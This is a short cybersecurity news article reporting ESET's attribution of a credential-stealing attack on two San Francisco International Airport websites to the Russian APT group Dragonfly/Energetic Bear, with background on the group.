San Francisco Airport Attack Linked to Russian State Hackers

A cyber-attack on San Francisco International Airport (SFO) last month was carried out by state-sponsored Russian hackers, according to Eset.

As reported by Infosecurity, the airport revealed in a breach notification last week that its SFOConnect.com and SFOConstruction.com websites came under attack in March.

“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” the notice explained. “Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”

However, Eset went further in a social media post yesterday, claiming that the incident was “in line with the TTPs of an APT group known as Dragonfly/Energetic Bear.”

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” it explained.

The firm also dismissed rumors that the attack had been carried out by Magecart digital skimming hackers.

“The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials,” it said.

It’s unclear exactly which visitors to the sites it was going after: SFOConnect appears to be a general information site designed for airport staff and contractors, while the SFOConstruction website, currently down for ‘maintenance,’ covers projects, bids and contracts related to the transport hub.

An Eset researcher confirmed that the vendor itself first reported the issue to the airport, which “quickly” fixed it.

Dragonfly has been active since at least 2011 and started out targeting organizations in the aviation as well as defense sectors, before moving on to hit energy and other industrial control system (ICS) firms in critical infrastructure industries.

Like many Russian APT groups, this one is known for relatively sophisticated, multi-stage intrusions often targeting the supply chain first before pivoting to targeted networks for reconnaissance, lateral movement and cyber-espionage.

What’s Hot on Infosecurity Magazine?